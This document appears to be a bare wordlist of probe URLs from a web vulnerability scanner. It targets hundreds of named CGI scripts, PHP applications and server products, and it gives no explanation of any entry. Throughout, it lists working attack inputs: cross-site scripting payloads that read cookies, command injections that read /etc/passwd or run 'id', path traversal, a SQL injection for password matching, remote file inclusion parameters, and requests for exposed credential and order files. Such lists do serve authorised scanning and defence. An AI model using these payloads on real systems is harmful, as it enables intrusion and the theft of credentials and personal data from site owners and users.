admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
nosuchurl/><script>alert('Vulnerable')</script>
test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
cgi-bin/myguestbook.cgi?action=view
cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/diagnose.cgi
cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
~/<script>alert('Vulnerable')</script>.aspx
~/<script>alert('Vulnerable')</script>.asp
z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
catinfo?<u><b>TESTING
webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
webamil/test.php
users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
user.php?op=userinfo&uname=<script>alert('hi');</script>
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>
servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>
servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
search/index.cfm?<script>alert(\"Vulnerable\")</script>
search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
search.php?zoom_query=<script>alert(\"hello\")</script>
search.php?searchstring=<script>alert(document.cookie)</script>
search.php?searchfor=\"><script>alert('Vulnerable');</script>
search.asp?term=<%00script>alert('Vulnerable')</script>
script>alert('Vulnerable')</script>.cfm
samples/search.dll?query=<script>alert(document.cookie)</script>
replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>
phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
phpimageview.php?pic=javascript:alert('Vulnerable')
phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
node/view/666\"><script>alert(document.domain)</script>
netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>
msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>
msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>
modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
mailman/listinfo/<script>alert('Vulnerable')</script>
ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
jigsaw/
isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
index.php?action=storenew&username=<script>alert('Vulnerable')</script>
index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script
index.php/\"><script><script>alert(document.cookie)</script><
index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
include.php?path=contact.php&contact_email=\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;
html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
gallery/search.php?searchstring=<script>alert(document.cookie)</script>
friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
downloads/pafiledb.php?action=rate&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=email&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=download&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
bb000001.pl<script>alert('Vulnerable')</script>
article.php?sid=\"><Img
apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
anthill/login.php
admin/login.php?path=\"></form><form
addressbook/index.php?surname=<script>alert('Vulnerable')</script>
addressbook/index.php?name=<script>alert('Vulnerable')</script>
add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
a?<script>alert('Vulnerable')</script>
a.jsp/<script>alert('Vulnerable')</script>
?mod=<script>alert(document.cookie)</script>&op=browse
<script>alert('Vulnerable')</script>.thtml
<script>alert('Vulnerable')</script>.shtml
<script>alert('Vulnerable')</script>.jsp
<script>alert('Vulnerable')</script>.aspx
/profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
cgi-bin/title.cgi
cgi-bin/compatible.cgi
add_user.php
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
cgi-bin/retrieve_password.pl
cgi-bin/wwwadmin.pl
cfdocs/expeval/displayopenedfile.cfm
cfdocs/expeval/sendmail.cfm
cgi-bin/bigconf.cgi
cgi-bin/webmap.cgi
cgi-bin/wwwwais
ammerum/
ariadne/
cbms/cbmsfoot.php
cbms/changepass.php
cbms/editclient.php
cbms/passgen.php
cbms/realinv.php
cbms/usersetup.php
cgi-bin/admin/admin.cgi
cgi-bin/admin/setup.cgi
cgi-bin/mt-static/mt-load.cgi
cgi-bin/mt-static/mt.cfg
cgi-bin/mt/mt-load.cgi
cgi-bin/mt/mt.cfg
cgi-bin-sdb/printenv
ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
db/users.dat
cgi-bin/cgiwrap/~@USERS
cgi-bin/cgiwrap/~JUNK(5)
cgi-bin/cgiwrap/~root
cgi-bin/dbman/db.cgi?db=no-db
cgi-bin/dcshop/auth_data/auth_user_file.txt
cgi-bin/DCShop/auth_data/auth_user_file.txt
cgi-bin/dcshop/orders/orders.txt
cgi-bin/DCShop/orders/orders.txt
cgi-bin/dumpenv.pl
cgi-bin/htsearch?-c/nonexistant
cgi-bin/mkilog.exe
cgi-bin/mkplog.exe
cgi-bin/orders/orders.txt
cgi-bin/processit.pl
cgi-bin/rpm_query
cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
cgi-bin/shop/auth_data/auth_user_file.txt
cgi-bin/shop/orders/orders.txt
cgi-bin/ws_ftp.ini
cgi-bin/WS_FTP.ini
?sql_debug=1
a_security.htm
Admin_files/order.log
admin.html
admin/cplogfile.log
admin/system_footer.php
cfdocs/snippets/fileexists.cfm
cgi-bin/MachineInfo
chat/!nicks.txt
chat/!pwds.txt
chat/data/usr
com
COM
config.php
config/
cplogfile.log
cutenews/index.php?debug
examples/jsp/snp/anything.snp
file-that-is-not-real-2002.php3
index.php?sql_debug=1
cgi-bin/view-source?view-source
cgi-bin/webplus?about
cfdocs/snippets/viewexample.cfm
chassis/config/GeneralChassisConfig.html
cgi-bin/ibill.pm
cgi-bin/scoadminreg.cgi
cgi-bin/SGB_DIR/superguestconfig
hp/device/this.LCDispatcher
cfdocs/snippets/evaluate.cfm
cfide/Administrator/startstop.html
cgi-bin/icat
cgi-bin/MsmMask.exe?mask=/junk334
cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
cgi-bin/query?mss=%2e%2e/config
cgi-bin/test-cgi?/*
cgi-bin/update.dpgs
cgi-bin/view-source
Mem/dynaform/FileExplorer.htm
cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
cgi-bin/lastlines.cgi?process
cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/campas?%0acat%0a/etc/passwd%0a
cgi-bin/cgicso?query=AAA
cgi-bin/cgiwrap
cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
cgi-bin/Count.cgi
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/echo.bat
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/ImageFolio/admin/admin.cgi
cgi-bin/info2www
cgi-bin/infosrch.cgi
cgi-bin/listrec.pl
cgi-bin/mailnews.cgi
cgi-bin/mmstdod.cgi
cgi-bin/pagelog.cgi
cgi-bin/perl?-v
cgi-bin/perl.exe?-v
cgi-bin/perl.exe
cgi-bin/perl
cgi-bin/plusmail
cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/spin_client.cgi?aaaaaaaa
cgi-bin/sscd_suncourier.pl
cgi-bin/viralator.cgi
cgi-bin/virgil.cgi
cgi-bin/vpasswd.cgi
cgi-bin/webgais
cgi-bin/websendmail
cgi-bin/whois.cgi?action=load&whois=%3Bid
cd-cgi/sscd_suncourier.pl
cgi-bin/common/listrec.pl
cgi-bin/handler
cgi-bin/handler/netsonar;cat
cgi-bin/webdist.cgi
DB4Web/10.10.10.10:100
ews/ews/architext_query.pl
exec/show/config/cr
instantwebmail/message.php
cfdocs/snippets/gettempdirectory.cfm
cgi-bin/stat.pl
cgi-bin/cachemgr.cgi
cgi-bin/ppdscgi.exe
cgi-bin/sws/admin.html
cgi-bin/webif.cgi
admin.php?en_log_id=0&action=config
admin.php?en_log_id=0&action=users
admin.php4?reg_login=1
admin/admin_phpinfo.php4
admin/login.php?action=insert&username=test&password=test
cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
interscan/cgi-bin/FtpSave.dll?I'm%20Here
ext.ini.%00.txt
cgi-bin/webdriver
dostuff.php?action=modify_user
cgi-bin/c32web.exe/ChangeAdminPassword
accounts/getuserdesc.asp
cgi-bin/cgi-lib.pl
cgi-bin/log/nether-log.pl?checkit
cgi-bin/mini_logger.cgi
cgi-bin/mt-static/
cgi-bin/mt/
cgi-bin/nimages.php
cgi-bin/robadmin.cgi
Admin/
cgi-bin/netpad.cgi
cgi-bin/troops.cgi
cgi-bin/unlg1.1
cgi-bin/unlg1.2
cgi-bin/rwwwshell.pl
cgi-bin/photo/manage.cgi
cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
agentadmin.php
b2-include/b2edit.showposts.php
catalog/includes/include_once.php
errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
sqldump.sql
structure.sql
servlet/SessionManager
php.ini
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
ip.txt
JUNK(6).cfm?mode=debug
level/42/exec/show%20conf
livehelp/
LiveHelp/
logicworks.ini
login.jsp
logins.html
logs/str_err.log
mall_log_files/order.log
mambo/administrator/phpinfo.php
megabook/files/20/setup.db
modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
modules.php?name=Members_List&sql_debug=1
myinvoicer/config.inc
officescan/hotdownload/ofscan.ini
order/order_log_v12.dat
order/order_log.dat
orders/order_log_v12.dat
Orders/order_log_v12.dat
orders/order_log.dat
Orders/order_log.dat
PDG_Cart/shopper.conf
phorum/admin/stats.php
php-coolfile/action.php?action=edit&file=config.php
phpBB/phpinfo.php
phpinfo.php
phpinfo.php3
pmlite.php
session/admnlogin
settings/site.ini
SiteScope/htdocs/SiteScope.html
soapdocs/ReleaseNotes.html
ssdefs/siteseed.dtd
servlet/allaire.jrun.ssi.SSIFilter
pp.php?action=login
isapi/count.pl?
krysalis/
logjam/showhits.php
manual.php
mods/apage/apage.cgi?f=file.htm.|id|
modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
perl/-e%20%22system('cat%20/etc/passwd');\%22
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
Program%20Files/
smssend.php
pls/simpledad/admin_/dadentries.htm
Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
ncl_items.html
ncl_items.shtml?SUBJECT=1
photo/manage.cgi
photodata/manage.cgi
pub/english.cgi?op=rmail
pvote/ch_info.php?newpass=password&confirm=password%20
scripts/wsisa.dll/WService=anything?WSMadmin
SetSecurity.shm
submit?setoption=q&option=allowed_ips&value=255.255.255.255
thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
shopadmin.asp
modsecurity.php
phpBB2/includes/db.php
<script>alert('Vulnerable')</script>
_vti_bin/shtml.exe/junk_nonexistant.exe
_vti_txt/_vti_cnf/
_vti_txt/
_vti_pvt/deptodoc.btr
_vti_pvt/doctodep.btr
_vti_pvt/services.org
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_vti_bin/_vti_aut/fp30reg.dll
_vti_pvt/access.cnf
_vti_pvt/botinfs.cnf
_vti_pvt/bots.cnf
_vti_pvt/service.cnf
_vti_pvt/services.cnf
_vti_pvt/svacl.cnf
_vti_pvt/writeto.cnf
_vti_pvt/linkinfo.cnf
admin/
isx.html
//
cgi-bin/blog/mt-check.cgi
mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;
mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com
mailman/listinfo
doc/
doc
webalizer/
web/
usage/
sitemap.xml
phpshare/phpshare.php
photo_album/apa_phpinclude.inc.php
cgis/wwwboard/wwwboard.cgi
cgis/wwwboard/wwwboard.pl
affich.php?image=<script>alert(document.cookie)</script>
diapo.php?rep=<script>alert(document.cookie)</script>
index.php?rep=<script>alert(document.cookie)</script>
admin/contextAdmin/contextAdmin.html
fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
blahb.ida
blahb.idq
ab2/\@AdminViewError
.DS_Store
.FBCIndex
\"><img%20src=\"javascript:alert(document.domain)\">
Survey/Survey.Htm
WEBAGENT/CQMGSERV/CF-SINFO.TPF
ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
ba4.nsf
BACLIENT
postinfo.html
na_admin/ataglance.html
scripts/samples/search/qfullhit.htw
scripts/samples/search/qsumrhit.htw
JUNK(5).htw
ttp://127.0.0.1:2301/
file/../../../../../../../../etc/
level/16/exec/-///pwd
level/16/exec/-///show/configuration
level/16
level/16/exec/
level/16/exec//show/access-lists
level/16/level/16/exec//show/configuration
level/16/level/16/exec//show/interfaces
level/16/level/16/exec//show/interfaces/status
level/16/level/16/exec//show/version
level/16/level/16/exec//show/running-config/interface/FastEthernet
level/16/exec//show
level/17/exec//show
level/18/exec//show
level/19/exec//show
level/20/exec//show
level/21/exec//show
level/22/exec//show
level/23/exec//show
level/24/exec//show
level/25/exec//show
level/26/exec//show
level/27/exec//show
level/28/exec//show
level/29/exec//show
level/30/exec//show
level/31/exec//show
level/32/exec//show
level/33/exec//show
level/34/exec//show
level/35/exec//show
level/36/exec//show
level/37/exec//show
level/38/exec//show
level/39/exec//show
level/40/exec//show
level/41/exec//show
level/42/exec//show
level/43/exec//show
level/44/exec//show
level/45/exec//show
level/46/exec//show
level/47/exec//show
level/48/exec//show
level/49/exec//show
level/50/exec//show
level/51/exec//show
level/52/exec//show
level/53/exec//show
level/54/exec//show
level/55/exec//show
level/56/exec//show
level/57/exec//show
level/58/exec//show
level/59/exec//show
level/60/exec//show
level/61/exec//show
level/62/exec//show
level/63/exec//show
level/64/exec//show
level/65/exec//show
level/66/exec//show
level/67/exec//show
level/68/exec//show
level/69/exec//show
level/70/exec//show
level/71/exec//show
level/72/exec//show
level/73/exec//show
level/74/exec//show
level/75/exec//show
level/76/exec//show
level/77/exec//show
level/78/exec//show
level/79/exec//show
level/80/exec//show
level/81/exec//show
level/82/exec//show
level/83/exec//show
level/84/exec//show
level/85/exec//show
level/86/exec//show
level/87/exec//show
level/88/exec//show
level/89/exec//show
level/90/exec//show
level/91/exec//show
level/92/exec//show
level/93/exec//show
level/94/exec//show
level/95/exec//show
